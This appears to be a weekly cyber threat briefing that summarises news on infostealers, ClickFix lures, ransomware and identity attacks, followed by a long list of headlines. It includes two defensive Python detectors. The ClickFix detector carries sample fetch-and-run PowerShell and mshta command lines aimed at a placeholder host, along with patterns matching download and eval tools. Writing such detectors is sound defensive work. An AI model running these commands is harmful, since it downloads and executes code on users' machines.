Source: https://www.theguardian.com/technology/2025/oct/23/gchq-companies-cyber-crime-threat

Study Reveals Cyber Confidence Often Misaligned with Reality

A new report highlights a gap between perceived cyber security strength and actual readiness. Many organisations believe they are well protected, yet lack basic controls such as multi-factor authentication and incident response testing. The analysis shows that overconfidence can lead to underinvestment in critical areas. Experts urge boards to validate their assumptions through independent assessments and to ensure that cyber security is governed like other enterprise risks. The findings reinforce the need for leadership accountability and continuous improvement.

Source: https://professionalsecurity.co.uk/products/cyber/confidence-and-reality/

Threat Actors Exploiting Faster Than Businesses Can Respond

Threat actors are now exploiting vulnerabilities within days of discovery, leaving businesses with little time to react. The article outlines how attackers use automation and AI to identify and weaponise weaknesses rapidly. Business leaders are urged to shorten patch cycles, improve threat intelligence sharing, and rehearse incident response. The piece emphasises that cyber resilience is no longer just a technical issue but a leadership challenge requiring proactive governance and investment in agility.

Source: https://www.itpro.com/security/cyber-attacks/threat-actors-exploiting-quickly-what-business-leaders-should-do

Millions Still Use One Password Across Multiple Accounts

A new study reveals that millions of users continue to rely on a single password for multiple accounts, despite years of awareness campaigns. The report finds that 31% of respondents reuse passwords across work and personal platforms, creating major risks for credential stuffing and account takeover. The article calls for stronger enforcement of password policies and wider adoption of password managers. It also highlights the need for leadership to model good behaviour and ensure staff receive regular training.

Source: https://cybernews.com/security/millions-use-one-password/

Microsoft Warns of Sharp Rise in Identity Attacks Driven by Password Theft

Microsoft has reported a 32% increase in identity-based cyber attacks in the first half of 2025, with over 97% involving password-based methods. According to its latest Digital Defense Report, attackers are increasingly using stolen credentials to impersonate employees or contractors, often leading to data theft and ransomware deployment. Infostealer malware and help desk scams are key tactics, with groups like Scattered Spider exploiting these methods. Microsoft also highlighted its efforts to disrupt threats such as Lumma Stealer and cracked Cobalt Strike tools. IT firms and government bodies remain top targets, while ransomware actors are increasingly abusing antivirus exclusions to bypass defences.

Source: https://therecord.media/microsoft-warns-of-surge-identity-hacks-passwords

Insider Risks Cause Data Loss in 77% of Organisations

A study finds that 77% of organisations have experienced data loss due to insider risks, including negligent or malicious behaviour. Security leaders cite lack of visibility and poor access controls as key contributors. The report stresses the importance of behavioural monitoring, role-based access, and staff awareness programmes. Insider threats are often overlooked compared to external attacks, yet they pose significant operational and reputational risks. Boards are advised to treat insider risk as a strategic issue requiring cross-functional governance.

Source: https://www.securitymagazine.com/articles/101964-security-leaders-share-why-77-organizations-lose-data-due-to-insider-risks

AI-Driven Threats Are Top Concern for Cyber Professionals in 2026

New research from ISACA finds that AI-driven threats are the biggest concern for cyber security professionals heading into 2026. The survey reveals that 62% of respondents expect AI to increase the volume and sophistication of attacks. Concerns include deepfakes, automated phishing, and AI-powered malware. The report also notes a gap in preparedness, with only 38% of organisations confident in their ability to defend against AI-enabled threats. The findings call for urgent investment in AI-aware defences and leadership engagement on emerging risks.

Source: https://www.businesswire.com/news/home/20251020612551/en/AI-Driven-Cyber-Threats-Are-the-Biggest-Concern-for-Cybersecurity-Professionals-Going-Into-2026-Finds-New-ISACA-Research

Infostealers Are Reshaping the Cyber Security Landscape

Infostealers are a type of malware designed to silently collect credentials, session tokens and sensitive data from infected devices. These tools are increasingly used by attackers to bypass multi-factor authentication: a stolen session token is replayed from the attacker's own machine, and because the MFA step was already completed on the victim's device, the service never prompts again. Unlike ransomware, infostealers operate quietly, often going undetected while harvesting data for later use or sale. The rise of malware-as-a-service has made infostealers widely accessible, with criminal groups offering subscription models. Experts urge organisations to monitor for unusual login patterns, such as an existing session suddenly being used from a new network or client, and to implement stronger endpoint protection. The trend reflects a shift from disruptive attacks to silent data theft.

Source: https://betanews.com/2025/10/22/how-infostealers-have-changed-the-cybersecurity-landscape/
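The "unusual login pattern" that gives away a replayed session token is that the same session identifier, issued once after an MFA-backed login, is later presented from a different network or client. The following is an added example of that check, not code from the briefing or from any product: it records the ASN and User-Agent seen at each login, then flags later uses of the same session from a different origin, and separately flags sessions that are used without any observed login. The event shape, field names and the sample events are constructed for this example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class AuthEvent:
    # Minimal authentication record. Field names are this example's own, not a product schema.
    ts: datetime
    user: str
    session_id: str   # identifier of the bearer session cookie / refresh token
    asn: int          # autonomous system of the client IP (from a GeoIP/ASN lookup)
    ua: str           # client User-Agent string
    event: str        # "login" (MFA completed) or "session_use" (token presented)


def find_token_replay(events):
    """Return (session_id, user, ts, reasons) for uses of a session that do not
    match the origin captured at its MFA-backed login, or that have no login at all.

    A replayed infostealer token never triggers a fresh MFA prompt, so the only
    signal is the mismatch between where the session was minted and where it is used."""
    origin = {}      # session_id -> (asn, ua) captured at login
    findings = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.event == "login":
            origin[ev.session_id] = (ev.asn, ev.ua)
            continue
        if ev.session_id not in origin:
            # Token presented although we never saw it issued: minted outside our
            # visibility, or a log gap. Worth a look either way.
            findings.append((ev.session_id, ev.user, ev.ts,
                             ["session used with no observed login"]))
            continue
        asn0, ua0 = origin[ev.session_id]
        reasons = []
        if ev.asn != asn0:
            reasons.append(f"ASN changed {asn0} -> {ev.asn}")
        if ev.ua != ua0:
            reasons.append(f"User-Agent changed {ua0!r} -> {ev.ua!r}")
        if reasons:
            findings.append((ev.session_id, ev.user, ev.ts, reasons))
    return findings


# Constructed sample events for this example; not real telemetry.
BASE = datetime(2025, 10, 20, 9, 0)
SAMPLE_EVENTS = [
    AuthEvent(BASE, "alice", "sess-A1", 12345, "Chrome/Windows", "login"),
    AuthEvent(BASE + timedelta(minutes=15), "alice", "sess-A1", 12345, "Chrome/Windows", "session_use"),
    # Same cookie, two hours later, from another network and a scripted client: token replay.
    AuthEvent(BASE + timedelta(hours=2), "alice", "sess-A1", 9009, "python-requests/2.31", "session_use"),
    AuthEvent(BASE, "bob", "sess-B7", 12345, "Chrome/Windows", "login"),
    AuthEvent(BASE + timedelta(hours=1), "bob", "sess-B7", 12345, "Chrome/Windows", "session_use"),
    # Session presented although no login for it was ever logged.
    AuthEvent(BASE + timedelta(hours=3), "carol", "sess-C2", 777, "Safari/macOS", "session_use"),
]

if __name__ == "__main__":
    for session_id, user, ts, reasons in find_token_replay(SAMPLE_EVENTS):
        print(f"{ts:%Y-%m-%d %H:%M} {user:6} {session_id}: {'; '.join(reasons)}")
```

ASN rather than raw IP is used as the origin because mobile and corporate egress addresses change legitimately within one network; a change of both ASN and client string on a token that never re-authenticated is the pattern to escalate, and the response is to revoke that session, not just the password.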

How ClickFix Attackers Trick You to Attack Yourself and Bypass Your Security

ClickFix is an attack method that presents itself as the fix for a broken page or as a CAPTCHA check, but in reality tricks users into running a command the attacker chose: the page silently places the command on the clipboard, and the "verification" steps tell the victim to open the Run dialog or a terminal, paste, and press Enter. Because the victim executes the command themselves, the attack bypasses email filters and relies on SEO poisoning and malvertising to lure victims. SEO poisoning involves attackers manipulating search engine results so that malicious websites appear high in search rankings, often mimicking legitimate help pages or software fixes. Once executed, the code runs locally under the user's own account and often evades endpoint detection. ClickFix has been linked to ransomware groups and state actors, with recent incidents affecting healthcare and municipal systems. The attack uses obfuscated JavaScript and legitimate-looking sites, making detection difficult.

Source: https://www.thehackernews.com/2025/10/analysing-clickfix-3-reasons-why.html
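Because the pasted command is launched by the victim from the Run dialog, it shows up in process-creation telemetry as a script interpreter whose parent is explorer.exe, usually with the download, in-memory execution and window-hiding switches that the lure needs. The following is an added example of a detection over such events, not code from the briefing or from any product: it scores each process-creation record against a small set of ClickFix traits and flags those that combine several, so that a user simply opening cmd.exe from Win+R is not enough on its own. The event shape, field names, sample records and example.invalid URLs are constructed for this example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    # Minimal process-creation record in a Sysmon Event ID 1 / Security 4688 shape.
    # Field names are this example's own choice, not any product's schema.
    parent_image: str
    image: str
    command_line: str


# Interpreters a ClickFix lure tells the victim to paste into (Win+R, PowerShell, cmd).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# The Run dialog (Win+R) is hosted by explorer.exe, so a pasted command appears as an
# interpreter whose parent is explorer.exe. The pasted text is also kept in
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU for forensic confirmation.
RUN_DIALOG_PARENTS = {"explorer.exe"}

# Command-line traits ClickFix payloads commonly combine. Each match is one reason.
INDICATORS = [
    (re.compile(r"(?i)-e(?:c|nc|ncodedcommand)\s+[A-Za-z0-9+/=]{20,}"), "base64-encoded command"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(?:invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|net\.webclient"
                r"|\biex\b|invoke-expression)"), "remote download / in-memory eval"),
    (re.compile(r"(?i)mshta(?:\.exe)?\s+https?://"), "mshta fetching a remote HTA"),
    # Lures append a comment so the victim sees "I am not a robot" in the Run box.
    (re.compile(r"(?i)#\s*.{0,60}(?:not a robot|captcha|verification|verify)"),
     "CAPTCHA-themed trailing comment"),
]


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons this event looks like a ClickFix execution."""
    if _basename(ev.image) not in INTERPRETERS:
        return []
    reasons = []
    if _basename(ev.parent_image) in RUN_DIALOG_PARENTS:
        reasons.append("interpreter spawned by explorer.exe (Run dialog)")
    reasons += [why for rx, why in INDICATORS if rx.search(ev.command_line)]
    return reasons


def find_clickfix(events, threshold=2):
    """Return (index, reasons) for events with at least `threshold` reasons.
    One reason alone (e.g. explorer.exe -> cmd.exe /c dir) is everyday user
    behaviour, so the default threshold requires a second trait."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((idx, reasons))
    return hits


# Constructed sample events for this example; not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"iex (iwr 'http://example.invalid/fix.ps1' -UseBasicParsing)\" "
              "# I am not a robot - reCAPTCHA Verification ID: 7811"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://example.invalid/verify.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcEvent(r"C:\Program Files\Microsoft VS Code\Code.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoLogo -NoExit"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for idx, reasons in find_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line[:60]!r}")
        for why in reasons:
            print("   -", why)
```

The same parent/child logic carries over to the macOS and Linux variants of the lure, where the interpreter is a shell spawned by Terminal with a curl-pipe-to-sh command; only the interpreter and parent sets change.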

Business Confidence in Ransomware Defence Is High, But Readiness Is Low

A report finds a disconnect between business confidence and actual preparedness for ransomware attacks. While 70% of executives believe their organisations are well protected, only 35% have tested incident response plans. The report shows that attackers are evolving faster than defences, with double extortion and data theft now common tactics. The findings suggest that leadership needs to challenge its own evaluation and invest in practical resilience measures, including tabletop exercises and supplier coordination.

Source: https://www.crowdstrike.com/en-us/blog/ransomware-reality-business-confidence-is-high-preparedness-is-low/

Ransomware Payouts Surge to $3.6M in Recent Cases

New data shows that ransomware payouts have surged, with recent cases reaching $3.6M. Attackers use double extortion tactics, demanding payment not only to decrypt data but also to prevent public exposure. The report highlights that many victims are SMEs with limited recovery options. Experts warn that paying ransoms often leads to further demands and does not guarantee full restoration. The findings support calls for stronger backup strategies and rehearsals of how to manage being attacked.

Source: https://www.infosecurity-magazine.com/news/ransomware-payouts-surge-dollar36m/

Third-Party Breaches Escalate as Confidence Gap Widens Among Cyber Leaders

Experts warn that third-party and supply chain breaches are spiralling out of control, with 60% of UK and US leaders admitting the risks are too complex to manage. Despite 97% expressing confidence in breach response, 61% reported suffering a third-party attack in the past year. The IO State of Information Security Report highlights incidents such as those at Jaguar Land Rover and Collins Aerospace, showing how supply chain compromise can cause widespread disruption. Smaller firms are increasingly targeted, yet only 23% of leaders ranked supply chain compromise among their top emerging threats.

Source: https://www.emergingrisks.co.uk/third-party-breaches-out-of-control-experts-warn/ 



Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Payouts Surge to $3.6m Amid Evolving Tactics - Infosecurity Magazine

Ransomware Reality: Business Confidence Is High, Preparedness Is Low

Scattered Lapsus$ Hunters Signal Shift in Tactics - Infosecurity Magazine

Madman Theory Spurs Crazy Scattered Lapsus$ Hunters Playbook

Agenda Ransomware Deploys Linux Variant on Windows Systems Through Remote Management Tools and BYOVD Techniques | Trend Micro (US)

What Microsoft’s 2025 report reveals about the new rules of engagement in cyberdefense - Help Net Security

Warlock Ransomware: Old Actor, New Tricks? | SECURITY.COM

Japanese companies brace themselves for more attacks as cybercrimes climb | The Straits Times

Ransomware Victims

JLR hack 'is costliest cyber attack in UK history', experts say - BBC News

Jaguar Land Rover cyberattack could cost the UK almost £2B • The Register

UK Ministry of Defense Probes Military Contractor Data Leak

Hackers are now a serious risk to patients' lives as NHS records the first death due to a cyber crime | Daily Mail Online

UK vehicle output drops by 36% following JLR cyber attack | Autocar

From Airport chaos to cyber intrigue: Everest Gang takes credit for Collins Aerospace breach - Security Affairs

Japanese retailer Muji halted online sales after a ransomware attack on logistics partner

UK Data Protection Regulator Fines Capita ~$18.8 Million Following a Ransomware Attack | Alston & Bird - JDSupra

Golfwear giant allegedly targeted by Russian hackers | Cybernews

Phishing & Email Based Attacks

Analysing ClickFix: 3 Reasons Why Copy/Paste Attacks Are Driving Security Breaches

This new cyberattack tricks you into hacking yourself. Here's how to spot it | ZDNET

How AI is driving email phishing and how to beat the threat [Q&A] - BetaNews

Many IT leaders click phishing links — and some don’t report them | CIO Dive

New Phishing Attack Leverages Azure Blob Storage to Impersonate Microsoft

Be prepared: AWS outage likely to trigger surge in phishing attacks | Cybernews

TikTok videos continue to push infostealers in ClickFix attacks

John Bolton charged over classified emails after Iranian hack of his AOL account

PhantomCaptcha ClickFix attack targets Ukraine war relief orgs

New .NET CAPI Backdoor Targets Russian Auto and E-Commerce Firms via Phishing ZIPs

Other Social Engineering

Analysing ClickFix: 3 Reasons Why Copy/Paste Attacks Are Driving Security Breaches

AI Social Engineering Top Cyber Threat for 2026, ISACA Survey Reveals - Infosecurity Magazine

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Google and Check Point nuke massive YouTube malware network • The Register

Researchers track surge in high-level Smishing Triad activity | CyberScoop

TikTok videos continue to push infostealers in ClickFix attacks

Ukraine Aid Groups Targeted Through Fake Zoom Meetings and Weaponized PDF Files

Fraud, Scams and Financial Crime

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Google and Check Point nuke massive YouTube malware network • The Register

Researchers track surge in high-level Smishing Triad activity | CyberScoop

Europol Dismantles SIM Farm Network Powering 49 Million Fake Accounts Worldwide

131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign

Myanmar Military Shuts Down Major Cybercrime Center and Detains Over 2,000 People - SecurityWeek

Man caught using suitcase ‘phone tower’ to target Victoria Line commuters with scam texts - My London

First conviction for promoting tax fraud on Instagram | HM Revenue & Customs (HMRC)

Cifas exposes dozens of email addresses in invite mishap • The Register

Artificial Intelligence

How AI is driving email phishing and how to beat the threat [Q&A] - BetaNews

Executives Fear AI Cyber Threats Could Outpace Defenses

AI-Driven Cyber Threats Are the Biggest Concern for Cybersecurity Professionals Going Into 2026, Finds New ISACA Research

AI-driven cybersecurity threats are now hitting businesses from every angle - here's how to stay safe | TechRadar

What Microsoft’s 2025 report reveals about the new rules of engagement in cyberdefense - Help Net Security

Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US - SecurityWeek

Cyber experts have been warning about AI-powered DDoS attacks – now they’re becoming a reality | IT Pro

Companies want the benefits of AI without the cyber blowback - Help Net Security

OpenAI's new Atlas browser may have some extremely concerning security issues, experts warn - here's what we know | TechRadar

Survey: Cybersecurity Teams Struggling to Keep Pace in the Age of AI - Security Boulevard

It Takes Only 250 Documents to Poison Any AI Model

AI Sidebar Spoofing Puts ChatGPT Atlas, Perplexity Comet and Other Browsers at Risk - SecurityWeek

Malware

How infostealers have changed the cybersecurity landscape - BetaNews

Lumma Stealer Vacuum Filled by Upgraded Vidar 2.0 Infostealer - Infosecurity Magazine

Threat Actors With Stealer Malwares Processing Millions of Credentials a Day - Cyber Security News

Why traditional bot defenses are failing in the age of intelligent automation | TechRadar

Google and Check Point nuke massive YouTube malware network • The Register

TikTok videos continue to push infostealers in ClickFix attacks

North Korean Hackers Combine BeaverTail and OtterCookie into Advanced JS Malware

Vidar Stealer 2.0 adds multi-threaded data theft, better evasion

Russia-linked COLDRIVER speeds up malware evolution after LOSTKEYS exposure

Cybercriminals turn to stealth to bypass malware detection - BetaNews

Security Teams Must Deploy Anti-Infostealer Defenses Now - Infosecurity Magazine

Google finds Russian state hackers replacing burned malware with new tools | The Record from Recorded Future News

Google ads for fake Homebrew, LogMeIn sites push infostealers

Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers

Self-spreading GlassWorm malware hits OpenVSX, VS Code registries

Cyber-criminals turn on each other: the story of Lumma Stealer's collapse | Fortra

Iranian hackers targeted over 100 govt orgs with Phoenix backdoor

Official Xubuntu website compromised to serve malware - Help Net Security

New .NET CAPI Backdoor Targets Russian Auto and E-Commerce Firms via Phishing ZIPs

Bots/Botnets

Why traditional bot defenses are failing in the age of intelligent automation | TechRadar

Mobile

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Europol Dismantles SIM Farm Network Powering 49 Million Fake Accounts Worldwide

131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign

EU watchdog attacks Britain over iPhone ‘backdoor’ demand

Man caught using suitcase ‘phone tower’ to target Victoria Line commuters with scam texts - My London

Why Some Apps Ask for Contacts (and What They Actually Do With Them)

6 steps to increase Android security in the enterprise | TechTarget

Denial of Service/DoS/DDoS

Cyber experts have been warning about AI-powered DDoS attacks – now they’re becoming a reality | IT Pro

How to Detect and Mitigate Hit and Run DDoS Attacks - Security Boulevard

Cache poisoning vulnerabilities found in 2 DNS resolving apps - Ars Technica

Multiple Gitlab Security Vulnerabilities Let Attackers Trigger DoS Condition

Security patch or self-inflicted DDoS? Microsoft update knocks out key enterprise functions | CSO Online

Internet of Things – IoT

Is Your Car a BYOD Risk? Researchers Demonstrate How

Your smart building isn't so smart without security - Help Net Security

When everything's connected, everything's at risk - Help Net Security

Bombarding Cars With Lasers: Novel Auto Attacks Emerge

Data Breaches/Leaks

Over 266,000 F5 BIG-IP instances exposed to remote attacks

Hackers Had Been Lurking in Cyber Firm F5 Systems Since 2023

F5 Networks Breach: A Wake-Up Call for Supply Chain Cybersecurity - Security Boulevard

183 million email accounts just got compromised. Check if you're affected | PCWorld

ICO defends decision not to investigate MoD Afghan data leak • The Register

FinWise data breach shows why encryption is your last defense

John Bolton charged over classified emails after Iranian hack of his AOL account

UK Data Protection Regulator Fines Capita ~$18.8 Million Following a Ransomware Attack | Alston & Bird - JDSupra

MoD probes claims Russian hackers stole files on bases - BBC News

Foreign hackers breached a US nuclear weapons plant via SharePoint flaws | CSO Online

Cifas exposes dozens of email addresses in invite mishap • The Register

American Airlines Subsidiary Envoy Air Hit by Oracle Hack - SecurityWeek

Hundreds of masked ICE agents doxxed by hackers, as personal details posted on Telegram

Organised Crime & Criminal Actors

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Myanmar Military Shuts Down Major Cybercrime Center and Detains Over 2,000 People - SecurityWeek

Hackers Attacking Remote Desktop Protocol Services With 30,000+ New IP Addresses Daily

Russian Government Now Actively Managing Cybercrime Groups: Security Firm - SecurityWeek

Cyber-criminals turn on each other: the story of Lumma Stealer's collapse | Fortra

US Congress committee investigating Musk-owned Starlink over Myanmar scam centres | Myanmar | The Guardian

Not Just Spies: Satellite Operators Say Cybercrime Is Major Threat

Russia Pivots, Cracks Down on Resident Hackers

Ex-Uber CSO talks teen cyber crims, CISO role with The Reg • The Register

Insider Risk and Insider Threats

Security Leaders Share Why 77% Organizations Lose Data Due to Insider Risks | Security Magazine

Are we human or are we security risk? - BetaNews

Insurance

Cyber war perception hindering capital and market growth: Johansmeyer at Convergence - Artemis.bm

Supply Chain and Third Parties

JLR hack 'is costliest cyber attack in UK history', experts say - BBC News

When Big Doesn’t Mean Bulletproof: The Importance of Third-Party Service Provider Due Diligence | Jackson Lewis P.C. - JDSupra

The next cyber crisis may start in someone else's supply chain - Help Net Security

Third party breaches out of control experts warn

F5 Networks Breach: A Wake-Up Call for Supply Chain Cybersecurity - Security Boulevard

Jaguar Land Rover August hack cost UK economy $2.5 billion: Report | Company News - Business Standard

UK Ministry of Defense Probes Military Contractor Data Leak

Third-Party Breaches: Why Vendor Passwords Put Your Organization at Risk - Security Boulevard

Japanese retailer Muji halted online sales after a ransomware attack on logistics partner

American Airlines subsidiary Envoy confirms Oracle data theft attack

Cloud/SaaS

AWS outage crashes Amazon, PrimeVideo, Fortnite, Perplexity and more

AWS Outage: Billions Lost, Multi-Cloud Is Wall Street’s Solution

Cybersecurity expert offers blunt verdict on AWS outage - TheStreet

AWS outage post-mortem fingers DNS as the culprit that took out a chunk of the internet and services for days — automation systems race and crash | Tom's Hardware

AWS outage exposes Achilles heel: central control plane • The Register

What the Huge AWS Outage Reveals About the Internet | WIRED

Amazon cloud outage fuels call for Europe to limit reliance on US tech – POLITICO

CyberCube estimates preliminary AWS outage loss range of $38-581m - Reinsurance News

Inside the messy reality of Microsoft 365 management - Help Net Security

Zoom isn't as private as you think. Here's how to lock it down | PCWorld

Foreign hackers breached a US nuclear weapons plant via SharePoint flaws | CSO Online

Outages

AWS outage crashes Amazon, PrimeVideo, Fortnite, Perplexity and more

Cybersecurity expert offers blunt verdict on AWS outage - TheStreet

AWS outage exposes Achilles heel: central control plane • The Register

What the Huge AWS Outage Reveals About the Internet | WIRED

Amazon cloud outage fuels call for Europe to limit reliance on US tech – POLITICO

Security patch or self-inflicted DDoS? Microsoft update knocks out key enterprise functions | CSO Online

Identity and Access Management

Microsoft warns of a 32% surge in identity hacks, mainly driven by stolen passwords | The Record from Recorded Future News

Encryption

EU watchdog attacks Britain over iPhone ‘backdoor’ demand

FinWise data breach shows why encryption is your last defense

Linux and Open Source

Europe's plan to ditch US tech giants is built on open source - and it's gaining steam | ZDNET

Amazon cloud outage fuels call for Europe to limit reliance on US tech – POLITICO

Official Xubuntu website compromised to serve malware - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

Microsoft warns of a 32% surge in identity hacks, mainly driven by stolen passwords | The Record from Recorded Future News

Threat Actors With Stealer Malwares Processing Millions of Credentials a Day - Cyber Security News

Millions rely on just one password for everything | Cybernews

Third-Party Breaches: Why Vendor Passwords Put Your Organization at Risk - Security Boulevard

183 million email accounts just got compromised. Check if you're affected | PCWorld

Social Media

Google and Check Point nuke massive YouTube malware network • The Register

Dissecting YouTube’s Malware Distribution Network - Check Point Research

Don't be fooled by this massive YouTube scam network - how to protect yourself | ZDNET

TikTok videos continue to push infostealers in ClickFix attacks

First conviction for promoting tax fraud on Instagram | HM Revenue & Customs (HMRC)

Training, Education and Awareness

Phishing training needs a new hook — here’s how to rethink your approach | CSO Online

Regulations, Fines and Legislation

UK cyber law delays 'deeply concerning,' say MPs | The Record from Recorded Future News

Experian fined $3.2 million for mass-collecting personal data

EU watchdog attacks Britain over iPhone ‘backdoor’ demand

ICO defends decision not to investigate MoD Afghan data leak • The Register

UK Data Protection Regulator Fines Capita ~$18.8 Million Following a Ransomware Attack | Alston & Bird - JDSupra

US ‘slipping’ on cybersecurity, annual Cyberspace Solarium Commission report concludes | CyberScoop

Behind the struggle for control of the CVE program | CyberScoop

Trump pardons former Binance CEO after guilty plea in letting cybercrime proceeds flow through platform | The Record from Recorded Future News

The US government shutdown is a wake-up call for cyber self-reliance | Computer Weekly

Trump's workforce cuts blamed as America's cyber edge dulls • The Register

Models, Frameworks and Standards

Experian fined $3.2 million for mass-collecting personal data

Careers, Working in Cyber and Information Security

Future Cybersecurity Workforce: Beyond Degrees, Toward Durable Skills

Why ex-military professionals are a good fit for cybersecurity - Help Net Security

Hiring Won’t Fix the Cyber Talent Gap: Building a Self-Improving Workforce Will

Law Enforcement Action and Take Downs

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Myanmar Military Shuts Down Major Cybercrime Center and Detains Over 2,000 People - SecurityWeek

Europol Dismantles SIM Farm Network Powering 49 Million Fake Accounts Worldwide

US Congress committee investigating Musk-owned Starlink over Myanmar scam centres | Myanmar | The Guardian

Man caught using suitcase ‘phone tower’ to target Victoria Line commuters with scam texts - My London

Former Director at US Hacking Tool Provider May Have Sold Secrets to Russia

First conviction for promoting tax fraud on Instagram | HM Revenue & Customs (HMRC)

Three arrested in UK on suspicion of assisting Russian intelligence service | UK news | The Guardian


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

The Rise of Collaborative Tactics Among China-aligned Cyber Espionage Campaigns | Trend Micro (US)

Electronic Warfare Puts Commercial GPS Users on Notice

Cyberespionage campaign PassiveNeuron targets machines running Windows Server | Securelist

The UK military says Russia targets its satellites on a weekly basis. What can be done about it?

Are we already witnessing space warfare in action: 'This is not just posturing' | Space

Cyber war perception hindering capital and market growth: Johansmeyer at Convergence - Artemis.bm

China

Hackers Had Been Lurking in Cyber Firm F5 Systems Since 2023

The Rise of Collaborative Tactics Among China-aligned Cyber Espionage Campaigns | Trend Micro (US)

Microsoft Is Warning That Russia and China Are Increasingly Using AI to Mount Cyberattacks on the U.S.

Salt Typhoon Uses Citrix Flaw in Global Cyber-Attack - Infosecurity Magazine

Hackers Used Snappybee Malware and Citrix Flaw to Breach European Telecom Network

Reconfiguring U.S. Cyber Strategy in the Wake of Salt Typhoon | Lawfare

Researchers track surge in high-level Smishing Triad activity | CyberScoop

China accuses US of cyberattack on national time center | AP News

Russia

Russian Government Now Actively Managing Cybercrime Groups: Security Firm - SecurityWeek

Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US - SecurityWeek

Russia-linked COLDRIVER speeds up malware evolution after LOSTKEYS exposure

Google finds Russian state hackers replacing burned malware with new tools | The Record from Recorded Future News

The UK military says Russia targets its satellites on a weekly basis. What can be done about it?

MoD probes claims Russian hackers stole files on bases - BBC News

Teen Tied to Russian Hackers in Dutch Cyber Espionage Probe - Infosecurity Magazine

EU and Ukraine deepen cooperation on cyber security - EU NEIGHBOURS east

Former Director at US Hacking Tool Provider May Have Sold Secrets to Russia

Ukraine Aid Groups Targeted Through Fake Zoom Meetings and Weaponized PDF Files

Three arrested in UK on suspicion of assisting Russian intelligence service | UK news | The Guardian

PhantomCaptcha ClickFix attack targets Ukraine war relief orgs

From Airport chaos to cyber intrigue: Everest Gang takes credit for Collins Aerospace breach - Security Affairs

Russia-linked hackers claim responsibility for Collins Aerospace cyber attack - Defence Connect

Golfwear giant allegedly targeted by Russian hackers | Cybernews

Iran

John Bolton charged over classified emails after Iranian hack of his AOL account

MuddyWater Targets 100+ MEA Gov Entities With Backdoor

Iranian hackers targeted over 100 govt orgs with Phoenix backdoor

John Bolton indictment says suspected Iranian hackers accessed his emails, issued threats | CyberScoop

North Korea

North Korean Hackers Combine BeaverTail and OtterCookie into Advanced JS Malware

How Lazarus Group used fake job ads to spy on Europe's drone and defense sector - Help Net Security

Lazarus Group Hunts European Drone Manufacturing Data

The Leak That Targeted the Leakers

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

How Business Leaders Can Turn Geopolitical Uncertainty Into Strategic Opportunity



Reports Published in the Last Week

Cyber resilience of UK digital infrastructure - POST



Vulnerability Management

Threat actors are exploiting flaws more quickly – here's what business leaders should do | IT Pro

Network security devices endanger orgs with ’90s era flaws | CSO Online

Behind the struggle for control of the CVE program | CyberScoop

Flawed Vendor Guidance Exposes Orgs to Avoidable Risk

Vulnerabilities

Over 266,000 F5 BIG-IP instances exposed to remote attacks

Flawed Vendor Guidance Exposes Orgs to Avoidable Risk

Microsoft fixes Windows bug breaking localhost HTTP connections

ConnectWise Patches Critical Flaw in Automate RMM Tool - SecurityWeek

Microsoft fixes one of its "highest ever" rated security flaws - here's what happened | TechRadar

Microsoft fixes Windows Server Active Directory sync issues

CISA: High-severity Windows SMB flaw now exploited in attacks

CISA Confirms Exploitation of Latest Oracle EBS Vulnerability - SecurityWeek

Oracle Releases October 2025 Patches - SecurityWeek

Windows Server emergency patches fix WSUS bug with PoC exploit

BIND Updates Address High-Severity Cache Poisoning Flaws - SecurityWeek

Cache poisoning vulnerabilities found in 2 DNS resolving apps - Ars Technica

Multiple Gitlab Security Vulnerabilities Let Attackers Trigger DoS Condition

Experts warn OpenAI’s ChatGPT Atlas has security flaws that could turn it against users—stealing sensitive data, downloading malware, or worse | Fortune

71,000+ WatchGuard Devices Vulnerable to Remote Code Execution Attacks

Researchers uncover remote code execution flaw in abandoned Rust code library | CyberScoop

Over 250 Magento Stores Hit Overnight as Hackers Exploit New Adobe Commerce Flaw

Salt Typhoon Uses Citrix Flaw in Global Cyber-Attack - Infosecurity Magazine

Hackers Used Snappybee Malware and Citrix Flaw to Breach European Telecom Network

Foreign hackers breached a US nuclear weapons plant via SharePoint flaws | CSO Online

